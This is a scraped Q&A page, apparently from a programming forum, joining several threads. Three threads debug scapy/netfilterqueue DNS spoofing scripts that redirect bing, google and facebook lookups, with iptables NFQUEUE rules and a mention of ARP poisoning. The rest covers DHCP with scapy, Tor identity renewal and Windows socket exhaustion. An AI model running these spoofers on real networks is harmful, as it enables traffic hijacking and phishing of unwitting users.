I am running this code and it seems it isn't even making it pass the second 2nd if statement. Can anyone help? If anyone could help it would appreciative since I am very new to this kind of stuff.
import netfilterqueue
import scapy.all as scapy
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.DNSRR):
qname = scapy_packet[scapy.DNSQR].qname
if 'www.bing.com' in qname:
print('[+] Spoofing Target...')
answer = scapy.DNSRR(rrname=qname, rdata='10.0.2.8')
scapy_packet[scapy.DNS].an = answer
scapy_packet[scapy.DNS].ancount = 1
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.UDP].len
del scapy_packet[scapy.UDP].chksum
packet.set_payload(str(scapy_packet))
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
bro you need to try this on the HTTP sites first like website.org and check if service apache is run using "service apache2 start"
Related
I've decided to try to request an IP using scapy. I am able to send out a discover and receive an offer in the variable ansD. Unfortunately I'm having trouble accessing the field that contains the offered IP address which should be ansD[BOOTP].yiaddr . It tells me that the field does not exist. I have looked around and have seen similar issues but cannot seem to understand why I can access normal packet fields, but fail to do so with BOOTP fields.
receivedIP = 0
conf.checkIPaddr = False
fam,hw = get_if_raw_hwaddr(conf.iface)
dhcp_discover = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=hw)/DHCP(options=[("message-type","discover"),"end"])
ansD,unans = srp(dhcp_discover, multi=True)
if True:
dhcp_request=Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=hw,yiaddr=ansD[BOOTP].yiaddr)/DHCP(options=[("message-type","request"),"end"])
ansR, unans = srp(dhcp_request,multi=True)
Object Error 'list' object has no attribute 'yiaddr'
I figured it out not two seconds after posting but hopefully this helps others in the future.
I used srp() instead of srp1(), the former returns multiple packets so I would need to index the specific packet I wanted to look at ansD[0][BOOTP].yiaddr . I have since changed my code to use srp1 instead since this is a DHCP request expecting only one specific "Offer" reply from the DHCP server.
Fixed code below
import sys
from scapy.all import *
receivedIP = 0
conf.checkIPaddr = False
fam,hw = get_if_raw_hwaddr(conf.iface)
dhcp_discover=Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=hw)/DHCP(options=[("message-type","discover"),"end"])
ansD = srp1(dhcp_discover, multi=True)
if True:
//Request using the IP the server offered us in ansD[BOOTP].yiaddr
dhcp_request = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=hw,yiaddr=ansD[BOOTP].yiaddr)/DHCP(options=[("message-type","request"),"end"])
ansR, unans = srp(dhcp_request,multi=True)
ansR.summary()
I've been following a course on Cybersecurity and I'm currently trying to make a DNS spoofer work. The idea is that each time the target (this same computer) tries to go to www.google.com it goes to the apache server instead. But the only thing it does is not connect to Google. Suffice to say, I have little experience.
I start by:
iptables -I INPUT -j NFQUEUE --queue-num 0
iptables -I OUTPUT -j NFQUEUE --queue-num 0
Then on Python 3.7
import netfilterqueue
import scapy.all as scapy
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.DNSRR):
qname = scapy_packet[scapy.DNSQR].qname
if b'www.google.com' in qname:
answer = scapy.DNSRR(rrname=qname, rdata=b'10.0.2.5')
scapy_packet[scapy.DNS].an = answer
scapy_packet[scapy.DNS].ancount = 1
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.UDP].len
del scapy_packet[scapy.UDP].chksum
packet.set_payload(b'scapy_packet')
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
I'm using a NAT network and 10.0.2.5 is my apache server.
Maybe replace:
packet.set_payload(b'scapy_packet')
with:
packet.set_payload(bytes(scapy_packet))
i don't know why mi script don't work, the victim browser shows : ERR: named not resolved.
My script
from scapy.all import *
from netfilterqueue import NetfilterQueue
spoofDomain = 'www.facebook.com'
spoofResolvedIp = '172.16.16.162'
queueId = 1
def dnsSpoof(packet):
originalPayload = IP( packet.get_payload() )
if not originalPayload.haslayer(DNSQR):
# Not a dns query, accept and go on
packet.accept()
else:
if ("m.facebook.com" in originalPayload[DNS].qd.qname) or ("facebook.com" in originalPayload[DNS].qd.qname) or ("www.facebook.com" in originalPayload[DNS].qd.qname) or ("edge-chat.facebook.com" in originalPayload[DNS].qd.qname):
print "Intercepted DNS request for " + spoofDomain + ": " + originalPayload.summary()
# Build the spoofed response
spoofedPayload = IP(dst=originalPayload[IP].dst, src=originalPayload[IP].src)/\
UDP(dport=originalPayload[UDP].dport, sport=originalPayload[UDP].sport)/\
DNS(id=originalPayload[DNS].id, qr=1, aa=1, qd=originalPayload[DNS].qd,\
an=DNSRR(rrname=originalPayload[DNS].qd.qname, ttl=10, rdata=spoofResolvedIp))
print "Spoofing DNS response to: " + spoofedPayload.summary()
packet.set_payload(str(spoofedPayload))
packet.accept()
print "------------------------------------------"
else:
# DNS query but not for target spoofDomain, accept and go on
packet.accept()
# bind the callback function to the queue
nfqueue = NetfilterQueue()
nfqueue.bind(queueId, dnsSpoof)
# wait for packets
try:
nfqueue.run()
except KeyboardInterrupt:
print('')
nfqueue.unbind()
I use iptables -t mangle -I FORWARD -p udp -j NFQUEUE --queue-num 1 command.
Firs i perform a man in the middle attack by ARP Cache spoofing. I used wireshark to see the traffic and it seems to be ok, I don't know whats is going on.
I solved the problem, I was looking for queries I don't see that sorry
if not originalPayload.haslayer(DNSQR)
DNSQR is dns query, and I want to take dns answers, so the code is that:
if not originalPayload.haslayer(DNSRR)
I'm attempting to control Tor with Python. I've read a couple of the other questions asked about this subject on stackoverflow but none of them answer this question.
I'm looking for a method to have tor give you a 'new identity', a new IP address, when the command is run. I've googled around and found the TorCtl module as a method for controlling tor, but can't find a way to get a new identity. Here's what I have so far for atleast connecting to tor, but can't get any farther.
from TorCtl import TorCtl
conn = TorCtl.connect(controlAddr="127.0.0.1", controlPort=9051, passphrase="123")
Any help on this is appreciated, if there are other modules better then TorCtl that'd be great too! Thank you!
Well, out of luck I managed to find a PHP script that did the exact same thing I wanted, and with the help of that I converted it to work in TorCtl. This is what it looks like for anyone else needing it in the future!
from TorCtl import TorCtl
conn = TorCtl.connect(controlAddr="127.0.0.1", controlPort=9051, passphrase="123")
TorCtl.Connection.send_signal(conn, "NEWNYM")
You can use a similar code in python:
def renewTorIdentity(self, passAuth):
try:
s = socket.socket()
s.connect(('localhost', 9051))
s.send('AUTHENTICATE "{0}"\r\n'.format(passAuth))
resp = s.recv(1024)
if resp.startswith('250'):
s.send("signal NEWNYM\r\n")
resp = s.recv(1024)
if resp.startswith('250'):
print "Identity renewed"
else:
print "response 2:", resp
else:
print "response 1:", resp
except Exception as e:
print "Can't renew identity: ", e
You can check this post for a mini-tutorial
Apparently the stem package works better. You can install tor on your computer and keep it running in terminal. Then run the following program:
from stem import Signal
from stem.control import Controller
with Controller.from_port(port = 9051) as controller:
controller.authenticate()
controller.signal(Signal.NEWNYM)
stem is the official package developed by tor.org, and you can see their documentation
I'm writing code that will run on Linux, OS X, and Windows. It downloads a list of approximately 55,000 files from the server, then steps through the list of files, checking if the files are present locally. (With SHA hash verification and a few other goodies.) If the files aren't present locally or the hash doesn't match, it downloads them.
The server-side is plain-vanilla Apache 2 on Ubuntu over port 80.
The client side works perfectly on Mac and Linux, but gives me this error on Windows (XP and Vista) after downloading a number of files:
urllib2.URLError: <urlopen error <10048, 'Address already in use'>>
This link: http://bytes.com/topic/python/answers/530949-client-side-tcp-socket-receiving-address-already-use-upon-connect points me to TCP port exhaustion, but "netstat -n" never showed me more than six connections in "TIME_WAIT" status, even just before it errored out.
The code (called once for each of the 55,000 files it downloads) is this:
request = urllib2.Request(file_remote_path)
opener = urllib2.build_opener()
datastream = opener.open(request)
outfileobj = open(temp_file_path, 'wb')
try:
while True:
chunk = datastream.read(CHUNK_SIZE)
if chunk == '':
break
else:
outfileobj.write(chunk)
finally:
outfileobj = outfileobj.close()
datastream.close()
UPDATE: I find by greping the log that it enters the download routine exactly 3998 times. I've run this multiple times and it fails at 3998 each time. Given that the linked article states that available ports are 5000-1025=3975 (and some are probably expiring and being reused) it's starting to look a lot more like the linked article describes the real issue. However, I'm still not sure how to fix this. Making registry edits is not an option.
If it is really a resource problem (freeing os socket resources)
try this:
request = urllib2.Request(file_remote_path)
opener = urllib2.build_opener()
retry = 3 # 3 tries
while retry :
try :
datastream = opener.open(request)
except urllib2.URLError, ue:
if ue.reason.find('10048') > -1 :
if retry :
retry -= 1
else :
raise urllib2.URLError("Address already in use / retries exhausted")
else :
retry = 0
if datastream :
retry = 0
outfileobj = open(temp_file_path, 'wb')
try:
while True:
chunk = datastream.read(CHUNK_SIZE)
if chunk == '':
break
else:
outfileobj.write(chunk)
finally:
outfileobj = outfileobj.close()
datastream.close()
if you want you can insert a sleep or you make it os depended
on my win-xp the problem doesn't show up (I reached 5000 downloads)
I watch my processes and network with process hacker.
Thinking outside the box, the problem you seem to be trying to solve has already been solved by a program called rsync. You might look for a Windows implementation and see if it meets your needs.
You should seriously consider copying and modifying this pyCurl example for efficient downloading of a large collection of files.
Instead of opening a new TCP connection for each request you should really use persistent HTTP connections - have a look at urlgrabber (or alternatively, just at keepalive.py for how to add keep-alive connection support to urllib2).
All indications point to a lack of available sockets. Are you sure that only 6 are in TIME_WAIT status? If you're running so many download operations it's very likely that netstat overruns your terminal buffer. I find that netstat stat overruns my terminal during normal useage periods.
The solution is to either modify the code to reuse sockets. Or introduce a timeout. It also wouldn't hurt to keep track of how many open sockets you have. To optimize waiting. The default timeout on Windows XP is 120 seconds. so you want to sleep for at least that long if you run out of sockets. Unfortunately it doesn't look like there's an easy way to check from Python when a socket has closed and left the TIME_WAIT status.
Given the asynchronous nature of the requests and timeouts, the best way to do this might be in a thread. Make each threat sleep for 2 minutes before it finishes. You can either use a Semaphore or limit the number of active threads to ensure that you don't run out of sockets.
Here's how I'd handle it. You might want to add an exception clause to the inner try block of the fetch section, to warn you about failed fetches.
import time
import threading
import Queue
# assumes url_queue is a Queue object populated with tuples in the form of(url_to_fetch, temp_file)
# also assumes that TotalUrls is the size of the queue before any threads are started.
class urlfetcher(threading.Thread)
def __init__ (self, queue)
Thread.__init__(self)
self.queue = queue
def run(self)
try: # needed to handle empty exception raised by an empty queue.
file_remote_path, temp_file_path = self.queue.get()
request = urllib2.Request(file_remote_path)
opener = urllib2.build_opener()
datastream = opener.open(request)
outfileobj = open(temp_file_path, 'wb')
try:
while True:
chunk = datastream.read(CHUNK_SIZE)
if chunk == '':
break
else:
outfileobj.write(chunk)
finally:
outfileobj = outfileobj.close()
datastream.close()
time.sleep(120)
self.queue.task_done()
elsewhere:
while url_queue.size() < TotalUrls: # hard limit of available ports.
if threading.active_threads() < 3975: # Hard limit of available ports
t = urlFetcher(url_queue)
t.start()
else:
time.sleep(2)
url_queue.join()
Sorry, my python is a little rusty, so I wouldn't be surprised if I missed something.